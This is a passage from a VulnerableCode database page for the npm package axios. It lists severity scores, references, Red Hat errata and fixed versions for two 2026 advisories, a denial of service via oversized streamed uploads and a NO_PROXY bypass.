risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xg1x-4spz-jucn

url VCID-yu5y-e4bk-zyfp

vulnerability_id VCID-yu5y-e4bk-zyfp

summary axios: Axios: Denial of Service via oversized streamed uploads bypassing body limits

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42034

reference_id

reference_type

scores

value	0.00096
scoring_system	epss
scoring_elements	0.26593
published_at	2026-06-05T12:55:00Z

value	0.00096
scoring_system	epss
scoring_elements	0.26583
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42034

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:12:43Z/

url

https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42034

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42034

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461623
reference_id	2461623
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461623

reference_url

https://github.com/advisories/GHSA-5c9x-8gcm-mpgx

reference_id

GHSA-5c9x-8gcm-mpgx

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-5c9x-8gcm-mpgx

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42034, GHSA-5c9x-8gcm-mpgx

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yu5y-e4bk-zyfp

url VCID-z5pf-pqcd-ckas

vulnerability_id VCID-z5pf-pqcd-ckas

summary axios: Axios: NO_PROXY bypass via crafted URL

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json

reference_id

reference_type

scores

value	7.2
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42043

reference_id

reference_type

scores

value	0.00026
scoring_system	epss
scoring_elements	0.07966
published_at	2026-06-06T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07951
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42043

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7

reference_id

reference_type

scores

value	7.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:47:20Z/

url

https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42043

reference_id

reference_type

scores

value	7.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42043

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461626
reference_id	2461626
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461626

reference_url

https://github.com/advisories/GHSA-pmwg-cvhr-8vh7

reference_id

GHSA-pmwg-cvhr-8vh7

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-pmwg-cvhr-8vh7

reference_url	https://access.redhat.com/errata/RHSA-2026:14937
reference_id	RHSA-2026:14937
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14937

reference_url	https://access.redhat.com/errata/RHSA-2026:16476
reference_id	RHSA-2026:16476
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16476

reference_url	https://access.redhat.com/errata/RHSA-2026:16532
reference_id	RHSA-2026:16532
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16532

reference_url	https://access.redhat.com/errata/RHSA-2026:16534
reference_id	RHSA-2026:16534
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16534

reference_url	https://access.redhat.com/errata/RHSA-2026:16535
reference_id	RHSA-2026:16535
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16535

reference_url	https://access.redhat.com/errata/RHSA-2026:16542
reference_id	RHSA-2026:16542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16542

reference_url	https://access.redhat.com/errata/RHSA-2026:16874
reference_id	RHSA-2026:16874
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16874

reference_url	https://access.redhat.com/errata/RHSA-2026:17468
reference_id	RHSA-2026:17468
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17468

reference_url	https://access.redhat.com/errata/RHSA-2026:17474
reference_id	RHSA-2026:17474
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17474

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19109
reference_id	RHSA-2026:19109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19109

reference_url	https://access.redhat.com/errata/RHSA-2026:19375
reference_id	RHSA-2026:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19375

reference_url	https://access.redhat.com/errata/RHSA-2026:20889
reference_id	RHSA-2026:20889
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20889

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:21017
reference_id	RHSA-2026:21017
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21017

reference_url	https://access.redhat.com/errata/RHSA-2026:21338
reference_id	RHSA-2026:21338
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21338

reference_url	https://access.redhat.com/errata/RHSA-2026:21772
reference_id	RHSA-2026:21772
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21772

reference_url	https://access.redhat.com/errata/RHSA-2026:22465
reference_id	RHSA-2026:22465
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22465

reference_url	https://access.redhat.com/errata/RHSA-2026:22619
reference_id	RHSA-2026:22619
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22619

reference_url	https://access.redhat.com/errata/RHSA-2026:22629
reference_id	RHSA-2026:22629
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22629

reference_url	https://access.redhat.com/errata/RHSA-2026:22840
reference_id	RHSA-2026:22840
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22840

reference_url	https://access.redhat.com/errata/RHSA-2026:23361
reference_id	RHSA-2026:23361
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:23361

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42043, GHSA-pmwg-cvhr-8vh7

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-z5pf-pqcd-ckas

Fixing_vulnerabilities

Risk_score 4.0

Resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.0

Package Instance